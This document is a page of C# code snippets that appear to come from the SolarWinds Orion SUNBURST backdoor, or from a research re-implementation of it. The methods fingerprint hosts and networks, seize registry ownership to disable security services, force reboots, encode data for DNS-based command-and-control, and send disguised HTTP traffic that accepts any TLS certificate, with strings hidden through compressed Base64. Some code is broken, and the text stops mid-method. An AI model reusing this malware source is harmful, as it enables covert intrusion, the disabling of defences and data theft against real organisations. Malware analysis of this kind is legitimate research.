Example #1
0
        public static void CollectSystemDescription(string info, out string result)
        {
            result = null;
            int    num        = 0;
            string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;

            result = result + Job.GetDescriptionId(ref num) + domainName;
            try
            {
                // Administrator
                string str = ((SecurityIdentifier) new NTAccount(domainName, ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier))).AccountDomainSid.ToString();
                result = result + Job.GetDescriptionId(ref num) + str;
            }
            catch
            {
                result += Job.GetDescriptionId(ref num);
            }
            result  = result + Job.GetDescriptionId(ref num) + IPGlobalProperties.GetIPGlobalProperties().HostName;
            result  = result + Job.GetDescriptionId(ref num) + Environment.UserName;
            result  = result + Job.GetDescriptionId(ref num) + Utilities.GetOSVersion(true);
            result  = result + Job.GetDescriptionId(ref num) + Environment.SystemDirectory;
            result  = result + Job.GetDescriptionId(ref num) + (int)TimeSpan.FromMilliseconds(Environment.TickCount).TotalDays;
            result  = result + Job.GetDescriptionId(ref num) + info + "\n";
            result += Utilities.GetNetworkAdapterConfiguration();
        }
        public static bool RebootComputer()
        {
            bool flag = false;

            bool result;

            try
            {
                bool   newState  = false;
                string privilege = ZipHelper.Unzip("C04NzigtSckvzwsoyizLzElNTwUA");
                if (!NativeMethods.SetProcessPrivilege(privilege, true, out newState))
                {
                    result = flag;
                }
                else
                {
                    flag = NativeMethods.InitiateSystemShutdownEx(null, null, 0U, true, true, 2147745794U);
                    NativeMethods.SetProcessPrivilege(privilege, newState, out newState);
                    result = flag;
                }
            }
            catch (Exception)
            {
                result = flag;
            }
            return(result);
        }
 private string GetUserAgent()
 {
     if (this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Get)
     {
         return(null);
     }
     if (this.requestMethod == HttpOipMethods.Post)
     {
         if (string.IsNullOrEmpty(Settings.userAgentDefault))
         {
             // Microsoft-CryptoAPI/
             Settings.userAgentDefault  = ZipHelper.Unzip("881MLsovzk8r0XUuqiwoyXcM8NQHAA==");
             Settings.userAgentDefault += Utilities.GetOSVersion(false);
         }
         return(Settings.userAgentDefault);
     }
     if (string.IsNullOrEmpty(Settings.userAgentOrionImprovementClient))
     {
         // SolarWindsOrionImprovementClient/
         Settings.userAgentOrionImprovementClient = ZipHelper.Unzip("C87PSSwKz8xLKfYvyszP88wtKMovS81NzStxzskEkvoA");
         try
         {
             // \OrionImprovement\SolarWinds.OrionImprovement.exe
             string text = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location);
             text += ZipHelper.Unzip("i/EvyszP88wtKMovS81NzSuJCc7PSSwKz8xLKdZDl9NLrUgFAA==");
             Settings.userAgentOrionImprovementClient += FileVersionInfo.GetVersionInfo(text).FileVersion;
         }
         catch (Exception)
         {
             // 3.0.0.382
             Settings.userAgentOrionImprovementClient += ZipHelper.Unzip("M9YzAEJjCyMA");
         }
     }
     return(Settings.userAgentOrionImprovementClient);
 }
        private static string Base64Encode(byte[] bytes, bool rt)
        {
            // ph2eifo3n5utg1j8d94qrvbmk0sal76c
            string text  = ZipHelper.Unzip("K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==");
            string text2 = "";
            uint   num   = 0U;
            int    i     = 0;

            foreach (byte b in bytes)
            {
                num |= (uint)((uint)b << i);
                for (i += 8; i >= 5; i -= 5)
                {
                    text2 += text[(int)(num & 31U)].ToString();
                    num  >>= 5;
                }
            }
            if (i > 0)
            {
                if (rt)
                {
                    num |= (uint)((uint)new Random().Next() << i);
                }
                text2 += text[(int)(num & 31U)].ToString();
            }
            return(text2);
        }
 private static void SetKeyOwnerWithPrivileges(RegistryKey key, string subKey, string owner)
 {
     try
     {
         RegistryHelper.SetKeyOwner(key, subKey, owner);
     }
     catch
     {
         bool newState  = false;
         bool newState2 = false;
         bool flag      = false;
         bool flag2     = false;
         // SeRestorePrivilege
         string privilege = ZipHelper.Unzip("C04NSi0uyS9KDSjKLMvMSU1PBQA=");
         // SeTakeOwnershipPrivilege
         string privilege2 = ZipHelper.Unzip("C04NScxO9S/PSy0qzsgsCCjKLMvMSU1PBQA=");
         flag  = NativeMethods.SetProcessPrivilege(privilege2, true, out newState);
         flag2 = NativeMethods.SetProcessPrivilege(privilege, true, out newState2);
         try
         {
             RegistryHelper.SetKeyOwner(key, subKey, owner);
         }
         finally
         {
             if (flag)
             {
                 NativeMethods.SetProcessPrivilege(privilege2, newState, out newState);
             }
             if (flag2)
             {
                 NativeMethods.SetProcessPrivilege(privilege, newState2, out newState2);
             }
         }
     }
 }
 private static string DecryptShort(string domain)
 {
     // 0123456789abcdefghijklmnopqrstuvwxyz-_.
     if (domain.All((char c) => ZipHelper.Unzip("MzA0MjYxNTO3sExMSk5JTUvPyMzKzsnNyy8oLCouKS0rr6is0o3XAwA=").Contains(c)))
     {
         return(CryptoHelper.Base64Decode(domain));
     }
     return("00" + CryptoHelper.Base64Encode(Encoding.UTF8.GetBytes(domain), false));
 }
        private static RegistryHive GetHive(string key, out string subKey)
        {
            string[] array = key.Split(new char[]
            {
                '\\'
            }, 2);
            string a = array[0].ToUpper();

            subKey = ((array.Length <= 1) ? "" : array[1]);
            // HKEY_CLASSES_ROOT
            // HKCR
            if (a == ZipHelper.Unzip("8/B2jYx39nEMDnYNjg/y9w8BAA==") || a == ZipHelper.Unzip("8/B2DgIA"))
            {
                return(RegistryHive.ClassesRoot);
            }
            // HKEY_CURRENT_USER
            // HKCU
            if (a == ZipHelper.Unzip("8/B2jYx3Dg0KcvULiQ8Ndg0CAA==") || a == ZipHelper.Unzip("8/B2DgUA"))
            {
                return(RegistryHive.CurrentUser);
            }
            // HKEY_LOCAL_MACHINE
            // HKLM
            if (a == ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzBQA=") || a == ZipHelper.Unzip("8/D28QUA"))
            {
                return(RegistryHive.LocalMachine);
            }
            // HKEY_USERS
            // HKU
            if (a == ZipHelper.Unzip("8/B2jYwPDXYNCgYA") || a == ZipHelper.Unzip("8/AOBQA="))
            {
                return(RegistryHive.Users);
            }
            // HKEY_CURRENT_CONFIG
            // HKCC
            if (a == ZipHelper.Unzip("8/B2jYx3Dg0KcvULiXf293PzdAcA") || a == ZipHelper.Unzip("8/B2dgYA"))
            {
                return(RegistryHive.CurrentConfig);
            }
            // HKEY_PERFOMANCE_DATA
            // HKPD
            if (a == ZipHelper.Unzip("8/B2jYwPcA1y8/d19HN2jXdxDHEEAA==") || a == ZipHelper.Unzip("8/AOcAEA"))
            {
                return(RegistryHive.PerformanceData);
            }
            // HKEY_DYN_DATA
            // HKDD
            if (a == ZipHelper.Unzip("8/B2jYx3ifSLd3EMcQQA") || a == ZipHelper.Unzip("8/B2cQEA"))
            {
                return(RegistryHive.DynData);
            }
            return((RegistryHive)0);
        }
		private static bool SetManualMode(ServiceConfiguration.Service[] svcList)
		{
			try
			{
				// SYSTEM\CurrentControlSet\services
				bool result = false;
				using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=")))
				{
					foreach (string text in registryKey.GetSubKeyNames())
					{
						foreach (ServiceConfiguration.Service service in svcList)
						{
							try
							{
								if (Utilities.GetHash(text.ToLower()) == service.timeStamp)
								{
									Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Interesting Service found " + text);
									if (service.started)
									{
										Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Service is started " + text + " setting " + registryKey + "to false");
										result = true;
										RegistryHelper.SetKeyPermissions(registryKey, text, false);
									}
									else
									{
										using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true))
										{
											// Start
											if (registryKey2.GetValueNames().Contains(ZipHelper.Unzip("Cy5JLCoBAA==")))
											{
												Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Setting " + text + " with value " + ZipHelper.Unzip("Cy5JLCoBAA=="));
												// Start
												registryKey2.SetValue(ZipHelper.Unzip("Cy5JLCoBAA=="), 4, RegistryValueKind.DWord);
												result = true;
											}
										}
									}
								}
							}
							catch (Exception)
							{
								Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error in SetManualMode");
							}
						}
					}
				}
				return result;
			}
			catch (Exception)
			{
			}
			return false;
		}
		public static void SetAutomaticMode()
		{
			try
			{
				// SYSTEM\CurrentControlSet\services
				using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=")))
				{
					foreach (string text in registryKey.GetSubKeyNames())
					{
						foreach (ServiceConfiguration serviceConfiguration in Settings.svcList)
						{
							if (serviceConfiguration.stopped)
							{
								foreach (ServiceConfiguration.Service service in serviceConfiguration.Svc)
								{
									try
									{
										if (Utilities.GetHash(text.ToLower()) == service.timeStamp)
										{
											if (service.started)
											{
												RegistryHelper.SetKeyPermissions(registryKey, text, true);
											}
											else
											{
												using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true))
												{
													if (registryKey2.GetValueNames().Contains("Start"))
													{
														registryKey2.SetValue("Start"), service.DefaultValue, RegistryValueKind.DWord);
													}
												}
											}
										}
									}
									catch (Exception)
									{
									}
								}
							}
						}
					}
				}
			}
			catch (Exception)
			{
			}
		}
        private static string Base64Decode(string s)
        {
            // rq3gsalt6u1iyfzop572d49bnx8cvmkewhj
            string text = ZipHelper.Unzip("Kyo0Ti9OzCkxKzXMrEyryi8wNTdKMbFMyquwSC7LzU4tz8gCAA==");
            // 0_-.
            string text2  = ZipHelper.Unzip("M4jX1QMA");
            string text3  = "";
            Random random = new Random();

            foreach (char value in s)
            {
                int num = text2.IndexOf(value);
                text3 = ((num < 0) ? (text3 + text[(text.IndexOf(value) + 4) % text.Length].ToString()) : (text3 + text2[0].ToString() + text[num + random.Next() % (text.Length / text2.Length) * text2.Length].ToString()));
            }
            return(text3);
        }
        private static string GetNewOwnerName()
        {
            string text = null;
            // S-1-5-
            string value = ZipHelper.Unzip("C9Y11DXVBQA=");
            // -500
            string value2 = ZipHelper.Unzip("0zU1MAAA");

            try
            {
                // Administrator
                text = new NTAccount(ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier)).Value;
            }
            catch
            {
            }
            if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
            {
                // Select * From Win32_UserAccount
                string queryString = ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA");
                text = null;
                using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString))
                {
                    foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
                    {
                        // SID
                        ManagementObject managementObject = (ManagementObject)managementBaseObject;
                        string           text2            = managementObject.Properties[ZipHelper.Unzip("C/Z0AQA=")].Value.ToString();
                        // LocalAccount
                        // true
                        if (managementObject.Properties[ZipHelper.Unzip("88lPTsxxTE7OL80rAQA=")].Value.ToString().ToLower() == ZipHelper.Unzip("KykqTQUA") && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase))
                        {
                            if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
                            {
                                text = text2;
                                break;
                            }
                            if (string.IsNullOrEmpty(text))
                            {
                                text = text2;
                            }
                        }
                    }
                }
            }
            return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value);
        }
Example #12
0
 public static void GetProcessByDescription(string[] args, out string result)
 {
     result = null;
     if (args.Length == 0)
     {
         foreach (Process process in Process.GetProcesses())
         {
             // [{0,5}] {1}
             result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNqzlAgA="), process.Id, Utilities.Quote(process.ProcessName));
         }
         return;
     }
     // Select * From Win32_Process
     using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=")))
     {
         foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
         {
             ManagementObject managementObject = (ManagementObject)managementBaseObject;
             string[]         array            = new string[]
             {
                 string.Empty,
                 string.Empty
             };
             ManagementObject managementObject2 = managementObject;
             // GetOwner
             string   methodName = ZipHelper.Unzip("c08t8S/PSy0CAA==");
             object[] array2     = array;
             object[] args2      = array2;
             // [{0,5}] {1,-16} {2}	{3,5} {4}\{5}
             Convert.ToInt32(managementObject2.InvokeMethod(methodName, args2));
             result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA="), new object[]
             {
                 // ProcessID
                 // Name
                 // ParentProcessID
                 managementObject[ZipHelper.Unzip("CyjKT04tLvZ0AQA=")],
                 Utilities.Quote(managementObject[ZipHelper.Unzip("80vMTQUA")].ToString()),
                 managementObject[args[0]],
                 managementObject[ZipHelper.Unzip("C0gsSs0rCSjKT04tLvZ0AQA=")],
                 array[1],
                 array[0]
             });
         }
     }
 }
        public static string GetNetworkAdapterConfiguration()
        {
            string text = "";
            string result;

            try
            {
                using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(
                           // Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true
                           ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3Sy0pzy/KdkxJLChJLXLOz0vLTC8tSizJzM9TKM9ILUpV8AxwzUtMyklNsS0pKk0FAA==")))
                {
                    foreach (ManagementObject obj in managementObjectSearcher.Get().Cast <ManagementObject>())
                    {
                        text += "\n";
                        // Description
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c0ktTi7KLCjJzM8DAA=="));
                        // MACAddress
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("83V0dkxJKUotLgYA"));
                        // DHCPEnabled
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/FwDnDNS0zKSU0BAA=="));
                        // DHCPServer
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/FwDghOLSpLLQIA"));
                        // DNSHostName
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/EL9sgvLvFLzE0FAA=="));
                        // DNSDomainSuffixSearchOrder
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/ELdsnPTczMCy5NS8usCE5NLErO8C9KSS0CAA=="));
                        // DNSServerSearchOrder
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/ELDk4tKkstCk5NLErO8C9KSS0CAA=="));
                        // IPAddress
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("8wxwTEkpSi0uBgA="));
                        // IPSubnet
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("8wwILk3KSy0BAA=="));
                        // DefaultIPGateway
                        text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c0lNSyzNKfEMcE8sSS1PrAQA"));
                    }
                    result = text;
                }
            }
            catch (Exception ex)
            {
                result = text + ex.Message;
            }
            return(result);
        }
 public static string GetOSVersion(bool full)
 {
     if (osVersion == null || osInfo == null)
     {
         try
         {
             // Select * From Win32_OperatingSystem
             using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3L0gtSizJzEsPriwuSc0FAA==")))
             {
                 ManagementObject managementObject = managementObjectSearcher.Get().Cast <ManagementObject>().FirstOrDefault <ManagementObject>();
                 // Caption
                 osInfo = managementObject.Properties[ZipHelper.Unzip("c04sKMnMzwMA")].Value.ToString();
                 // OSArchitecture
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8w92LErOyCxJTS4pLUoFAA==")].Value.ToString();
                 // InstallDate
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("88wrLknMyXFJLEkFAA==")].Value.ToString();
                 // Organization
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8y9KT8zLrEosyczPAwA=")].Value.ToString();
                 // RegisteredUser
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("C0pNzywuSS1KTQktTi0CAA==")].Value.ToString();
                 // Version
                 string text = managementObject.Properties[ZipHelper.Unzip("C0stKs7MzwMA")].Value.ToString();
                 osInfo = osInfo + ";" + text;
                 string[] array = text.Split(new char[]
                 {
                     '.'
                 });
                 osVersion = array[0] + "." + array[1];
             }
         }
         catch (Exception)
         {
             osVersion = Environment.OSVersion.Version.Major + "." + Environment.OSVersion.Version.Minor;
             // [E] {0} {1} {2}
             osInfo = string.Format(ZipHelper.Unzip("i3aNVag2qFWoNgRio1oA"), Environment.OSVersion.VersionString, Environment.OSVersion.Version, Environment.Is64BitOperatingSystem ? 64 : 32);
         }
     }
     if (!full)
     {
         return(osVersion);
     }
     return(osInfo);
 }
Example #15
0
        private static bool GetOrCreateUserID(out byte[] hash64)
        {
            string text = ReadDeviceInfo();

            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Device info: " + text);

            hash64 = new byte[8];
            Array.Clear(hash64, 0, hash64.Length);
            if (text == null)
            {
                return(false);
            }
            text += domain4;
            try
            {
                // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
                // MachineGuid
                text += RegistryHelper.GetValue(ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzjQn2dwsJdwxyjfHNTC7KL85PK4lxLqosKMlPL0osyKgEAA=="), ZipHelper.Unzip("801MzsjMS3UvzUwBAA=="), "");
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Registry/MachineGuid info: " + text);
            }
            catch
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error GetOrCreateUserID");
            }
            using (MD5 md = MD5.Create())
            {
                byte[] bytes = Encoding.ASCII.GetBytes(text);
                byte[] array = md.ComputeHash(bytes);
                if (array.Length < hash64.Length)
                {
                    return(false);
                }
                for (int i = 0; i < array.Length; i++)
                {
                    byte[] array2 = hash64;
                    int    num    = i % hash64.Length;
                    array2[num] ^= array[i];
                }
            }
            return(true);
        }
Example #16
0
        public static bool WriteReportStatus(ReportStatus status)
        {
            ReportStatus reportStatus;

            if (ConfigManager.ReadReportStatus(out reportStatus))
            {
                switch (status)
                {
                // 4
                case ReportStatus.New:
                    return(ConfigManager.WriteConfig(Settings.reportStatusName, ZipHelper.Unzip("MwEA")));

                // 5
                case ReportStatus.Append:
                    return(ConfigManager.WriteConfig(Settings.reportStatusName, ZipHelper.Unzip("MwUA")));

                // 3
                case ReportStatus.Truncate:
                    return(ConfigManager.WriteConfig(Settings.reportStatusName, ZipHelper.Unzip("MwYA")));
                }
            }
            return(false);
        }
        public string GetPreviousString(out bool last)
        {
            string text   = CryptoHelper.CreateSecureString(this.guid, true);
            int    num    = 32 - text.Length - 1;
            string result = "";

            last = false;
            if (this.offset >= this.dnStr.Length || this.nCount > 36)
            {
                return(result);
            }
            int num2 = Math.Min(num, this.dnStr.Length - this.offset);

            this.dnStrLower = this.dnStr.Substring(this.offset, num2);
            this.offset    += num2;
            // -_0
            if (ZipHelper.Unzip("0403AAA=").Contains(this.dnStrLower[this.dnStrLower.Length - 1]))
            {
                if (num2 == num)
                {
                    this.offset--;
                    this.dnStrLower = this.dnStrLower.Remove(this.dnStrLower.Length - 1);
                }
                this.dnStrLower += "0";
            }
            if (this.offset >= this.dnStr.Length || this.nCount > 36)
            {
                this.nCount = -1;
            }
            result = text + CryptoHelper.CreateString(this.nCount, text[0]) + this.dnStrLower + this.GetStatus();
            if (this.nCount >= 0)
            {
                this.nCount++;
            }
            last = (this.nCount < 0);
            return(result);
        }
        public static void SetKeyPermissions(RegistryKey key, string subKey, bool reset)
        {
            bool isProtected = !reset;
            // SYSTEM
            string text  = ZipHelper.Unzip("C44MDnH1BQA=");
            string text2 = reset ? text : RegistryHelper.GetNewOwnerName();

            RegistryHelper.SetKeyOwnerWithPrivileges(key, subKey, text);
            using (RegistryKey registryKey = key.OpenSubKey(subKey, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions))
            {
                RegistrySecurity registrySecurity = new RegistrySecurity();
                if (!reset)
                {
                    RegistryAccessRule rule = new RegistryAccessRule(text2, RegistryRights.FullControl, InheritanceFlags.None, PropagationFlags.NoPropagateInherit, AccessControlType.Allow);
                    registrySecurity.AddAccessRule(rule);
                }
                registrySecurity.SetAccessRuleProtection(isProtected, false);
                registryKey.SetAccessControl(registrySecurity);
            }
            if (!reset)
            {
                RegistryHelper.SetKeyOwnerWithPrivileges(key, subKey, text2);
            }
        }
Example #19
0
        public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
        {
            result = null;
            string requestUriString = args[0];
            string s    = args[1];
            string text = (args.Length >= 3) ? args[2] : null;

            string[] array = Encoding.UTF8.GetString(Convert.FromBase64String(s)).Split(new string[]
            {
                "\r\n",
                "\r",
                "\n"
            }, StringSplitOptions.None);
            HttpWebRequest httpWebRequest  = (HttpWebRequest)WebRequest.Create(requestUriString);
            HttpWebRequest httpWebRequest2 = httpWebRequest;

            httpWebRequest2.ServerCertificateValidationCallback =
                (RemoteCertificateValidationCallback)Delegate.Combine(httpWebRequest2.ServerCertificateValidationCallback, new RemoteCertificateValidationCallback((object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) => true));
            httpWebRequest.Proxy   = proxy;
            httpWebRequest.Timeout = 120000;
            httpWebRequest.Method  = array[0].Split(new char[]
            {
                ' '
            })[0];
            foreach (string text2 in array)
            {
                int num = text2.IndexOf(':');
                if (num > 0)
                {
                    string text3 = text2.Substring(0, num);
                    string text4 = text2.Substring(num + 1).TrimStart(Array.Empty <char>());
                    if (!WebHeaderCollection.IsRestricted(text3))
                    {
                        httpWebRequest.Headers.Add(text2);
                    }
                    else
                    {
                        ulong hash = Utilities.GetHash(text3.ToLower());
                        // expect
                        if (hash <= 8873858923435176895UL)
                        {
                            // content-type
                            if (hash <= 6116246686670134098UL)
                            {
                                // accept
                                if (hash != 2734787258623754862UL)
                                {
                                    // content-type
                                    if (hash == 6116246686670134098UL)
                                    {
                                        httpWebRequest.ContentType = text4;
                                    }
                                }
                                else
                                {
                                    httpWebRequest.Accept = text4;
                                }
                            }
                            // user-agent
                            else if (hash != 7574774749059321801UL)
                            {
                                // expect
                                if (hash == 8873858923435176895UL)
                                {
                                    // 100-continue
                                    if (Utilities.GetHash(text4.ToLower()) == 1475579823244607677UL)
                                    {
                                        httpWebRequest.ServicePoint.Expect100Continue = true;
                                    }
                                    else
                                    {
                                        httpWebRequest.Expect = text4;
                                    }
                                }
                            }
                            else
                            {
                                httpWebRequest.UserAgent = text4;
                            }
                        }
                        // connection
                        else if (hash <= 11266044540366291518UL)
                        {
                            // referer
                            if (hash != 9007106680104765185UL)
                            {
                                // connection
                                if (hash == 11266044540366291518UL)
                                {
                                    ulong hash2 = Utilities.GetHash(text4.ToLower());
                                    // keep-alive
                                    httpWebRequest.KeepAlive = (hash2 == 13852439084267373191UL || httpWebRequest.KeepAlive);
                                    // close
                                    httpWebRequest.KeepAlive = (hash2 != 14226582801651130532UL && httpWebRequest.KeepAlive);
                                }
                            }
                            else
                            {
                                httpWebRequest.Referer = text4;
                            }
                        }
                        // if-modified-since
                        else if (hash != 15514036435533858158UL)
                        {
                            // date
                            if (hash == 16066522799090129502UL)
                            {
                                httpWebRequest.Date = DateTime.Parse(text4);
                            }
                        }
                        else
                        {
                            httpWebRequest.Date = DateTime.Parse(text4);
                        }
                    }
                }
            }
            // {0} {1} HTTP/{2}

            result += string.Format(ZipHelper.Unzip("qzaoVag2rFXwCAkJ0K82quUCAA=="), httpWebRequest.Method, httpWebRequest.Address.PathAndQuery, httpWebRequest.ProtocolVersion.ToString());
            result  = result + httpWebRequest.Headers.ToString() + "\n\n";
            if (!string.IsNullOrEmpty(text))
            {
                using (Stream requestStream = httpWebRequest.GetRequestStream())
                {
                    byte[] array3 = Convert.FromBase64String(text);
                    requestStream.Write(array3, 0, array3.Length);
                }
            }
            using (WebResponse response = httpWebRequest.GetResponse())
            {
                result += string.Format("{0} {1}\n", (int)((HttpWebResponse)response).StatusCode, ((HttpWebResponse)response).StatusDescription);
                result  = result + response.Headers.ToString() + "\n";
                using (Stream responseStream = response.GetResponseStream())
                {
                    result += new StreamReader(responseStream).ReadToEnd();
                }
            }
        }
		private static bool SearchConfigurations()
		{
			Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Entering SearchConfigurations()");
			// Select * From Win32_SystemDriver
			Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Search Configurations: " + ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA=="));
			using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==")))
			{
				foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
				{
					// PathName
					ulong hash = Utilities.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()).ToLower());

					if (!Settings.printy)
					{
						Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Checking property: " + ZipHelper.Unzip("C0gsyfBLzE0FAA==") + "  GetFileName: " + Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()));
					}
					if ((Array.IndexOf<ulong>(Settings.configTimeStamps, hash) != -1))
					{
						Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Check for special drivers failed . Backdoor ConfigTimeStamps detected last GetFileName with hash " + hash + " [Use -r to Bypass]");
						if (Settings.bypassr)
						{
							Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Because you are bypassing drivers/process check, the backdoor will continue. In a normal case teh backdoor stop execution. ");
						}
						else
						{
							return true;
						}
					}
				}
			}
			return false;
		}
        private string GetBaseUriImpl(HttpHelper.HttpOipExMethods method, int err)
        {
            string text = null;

            if (method == HttpHelper.HttpOipExMethods.Head)
            {
                text = ((ushort)err).ToString();
            }
            if (this.requestMethod == HttpOipMethods.Post)
            {
                string[] array = new string[]
                {
                    // -root
                    ZipHelper.Unzip("0y3Kzy8BAA=="),
                    // -cert
                    ZipHelper.Unzip("001OLSoBAA=="),
                    // -universal_ca
                    ZipHelper.Unzip("0y3NyyxLLSpOzIlPTgQA"),
                    // -ca
                    ZipHelper.Unzip("001OBAA="),
                    // -primary_ca
                    ZipHelper.Unzip("0y0oysxNLKqMT04EAA=="),
                    // -timestamp
                    ZipHelper.Unzip("0y3JzE0tLknMLQAA"),
                    "",
                    // -global
                    ZipHelper.Unzip("003PyU9KzAEA"),
                    // -secureca
                    ZipHelper.Unzip("0y1OTS4tSk1OBAA=")
                };
                // pki/crl/{0}{1}{2}.crl
                return(string.Format(ZipHelper.Unzip("K8jO1E8uytGvNqitNqytNqrVA/IA"), this.random.Next(100, 10000), array[this.random.Next(array.Length)], (text == null) ? "" : ("-" + text)));
            }
            if (this.requestMethod == HttpOipMethods.Put)
            {
                string[] array2 = new string[]
                {
                    // Bold
                    ZipHelper.Unzip("c8rPSQEA"),
                    // BoldItalic
                    ZipHelper.Unzip("c8rPSfEsSczJTAYA"),
                    // ExtraBold
                    ZipHelper.Unzip("c60oKUp0ys9JAQA="),
                    // ExtraBoldItalic
                    ZipHelper.Unzip("c60oKUp0ys9J8SxJzMlMBgA="),
                    // Italic
                    ZipHelper.Unzip("8yxJzMlMBgA="),
                    // Light
                    ZipHelper.Unzip("88lMzygBAA=="),
                    // LightItalic
                    ZipHelper.Unzip("88lMzyjxLEnMyUwGAA=="),
                    // Regular
                    ZipHelper.Unzip("C0pNL81JLAIA"),
                    // SemiBold
                    ZipHelper.Unzip("C07NzXTKz0kBAA=="),
                    // SemiBoldItalic
                    ZipHelper.Unzip("C07NzXTKz0nxLEnMyUwGAA==")
                };
                string[] array3 = new string[]
                {
                    // opensans
                    ZipHelper.Unzip("yy9IzStOzCsGAA=="),
                    // noto
                    ZipHelper.Unzip("y8svyQcA"),
                    // freefont
                    ZipHelper.Unzip("SytKTU3LzysBAA=="),
                    // SourceCodePro
                    ZipHelper.Unzip("C84vLUpOdc5PSQ0oygcA"),
                    // SourceSerifPro
                    ZipHelper.Unzip("C84vLUpODU4tykwLKMoHAA=="),
                    // SourceHanSans
                    ZipHelper.Unzip("C84vLUpO9UjMC07MKwYA"),
                    // SourceHanSerif
                    ZipHelper.Unzip("C84vLUpO9UjMC04tykwDAA==")
                };
                int num = this.random.Next(array3.Length);
                if (num <= 1)
                {
                    // fonts/woff/{0}-{1}-{2}-webfont{3}.woff2
                    return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA"), new object[]
                    {
                        this.random.Next(100, 10000),
                        array3[num],
                        array2[this.random.Next(array2.Length)].ToLower(),
                        text
                    }));
                }
                // fonts/woff/{0}-{1}-{2}{3}.woff2
                return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA="), new object[]
                {
                    this.random.Next(100, 10000),
                    array3[num],
                    array2[this.random.Next(array2.Length)],
                    text
                }));
            }
            else
            {
                if (method <= HttpHelper.HttpOipExMethods.Head)
                {
                    string text2 = "";
                    if (this.Valid(20))
